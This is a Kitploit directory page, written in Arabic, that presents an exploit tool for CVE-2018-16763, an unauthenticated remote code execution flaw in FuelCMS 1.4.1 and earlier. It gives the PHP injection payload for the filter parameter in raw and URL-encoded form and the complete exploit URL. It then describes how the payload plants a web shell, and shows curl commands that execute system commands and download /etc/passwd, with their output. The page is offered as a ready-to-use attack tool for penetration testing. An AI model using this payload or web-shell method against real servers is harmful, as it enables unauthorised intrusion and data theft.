Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-16763-FuelCMS-1.4.1-RCE — استغلال لتشغيل RCE لـ CVE-2018-16763 على FuelCMS <= 1.4.1 وغلاف تفاعلي | Kitploit
أدوات/GitHubGitHub/p0dalirius/cve-2018-16763-fuelcms-1.4.1-rce
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubp0dalirius/cve-2018-16763-fuelcms-1.4.1-rce

CVE-2018-16763-FuelCMS-1.4.1-RCE

استغلال لتشغيل RCE لـ CVE-2018-16763 على FuelCMS <= 1.4.1 وغلاف تفاعلي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودعالموقع الإلكتروني
263منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2018-16763 - FuelCMS <= 1.4.1 RCE

استغلال لتشغيل RCE لـ CVE-2018-16763 على FuelCMS <= 1.4.1 وشل تفاعلية.
إصدار GitHub (الأحدث حسب التاريخ) مشتركي قناة يوتيوب

الميزات

  • رفع واجهة برمجة تطبيقات (API) موقع قشرة ويب PHP تلقائيًا في FuelCMS باستخدام CVE-2018-16763.
  • تنفيذ أوامر النظام عبر API باستخدام ?action=exec.
  • تنزيل الملفات من النظام البعيد إلى جهازك المهاجم باستخدام ?action=download.

الاستخدام

المتطلبات: لا شيء مطلوب، هذا الاستغلال غير موثَّق.

الخطوة 1: رفع إضافة القشرة الويب

أولاً، تحتاج إلى بدء console.py التفاعلي لتنفيذ الأوامر وتنزيل الملفات البعيدة. سيستخدم حقن كود PHP لـ CVE-2018-16763 في معامل filter لرفع واجهة برمجة تطبيقات قشرة PHP ويب في FuelCMS باستخدام file_put_contents. الحمولة المستخدمة هي التالية:

root@kitploit:~
'+pi(print($a='file_put_contents'))+$a($_POST["d0eb3f9a"],$_POST["9bc30f43"])+'

هذه الحمولة بعد ترميز URL تعطي:

root@kitploit:~
%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27

عنوان URL النهائي للاستغلال هو:

root@kitploit:~
http://127.0.0.1:10080/fuel/pages/select/?filter=%27%2Bpi%28print%28%24a%3D%27file%5Fput%5Fcontents%27%29%29%2B%24a%28%24%5FPOST%5B%22d0eb3f9a%22%5D%2C%24%5FPOST%5B%229bc30f43%22%5D%29%2B%27

الآن، يقوم console.py التفاعلي بإجراء طلب POST إلى هذا الرابط لرفع ./webshell/webshell.php إلى Fuel CMS.

الخطوة 2.1: تنفيذ الأوامر

يمكنك الآن تنفيذ الأوامر عن طريق إرسال طلب GET أو POST إلى http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php مع action=exec&cmd=id:

root@kitploit:~
$ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=exec&cmd=id"
{"stdout":"uid=33(www-data) gid=33(www-data) groups=33(www-data)\n","exec":"id"}

يمكنك أيضًا الوصول إليه عبر طلب GET من المتصفح.

الخطوة 2.2: تنزيل الملفات

يمكنك أيضًا تنزيل الملفات البعيدة عن طريق إرسال طلب GET أو POST إلى http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php مع action=download&cmd=/etc/passwd:

root@kitploit:~
$ curl -X POST 'http://127.0.0.1:10080/c1f3e834b49c4e548ebde7f596028f5b.php' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

يمكنك أيضًا تنزيل ملف بعيد من المتصفح عبر طلب GET.

الخطوة 3: وحدة التحكم التفاعلية

عندما تكون قشرتك الويب نشطة، يمكنك الآن استخدام console.py التفاعلي لتنفيذ الأوامر وتنزيل الملفات البعيدة.

https://user-images.githubusercontent.com/79218792/171498197-2fb8a7bd-45b0-4fd7-86a1-9bb74aa31664.mp4

المراجع

  • https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4
تنزيل الأداة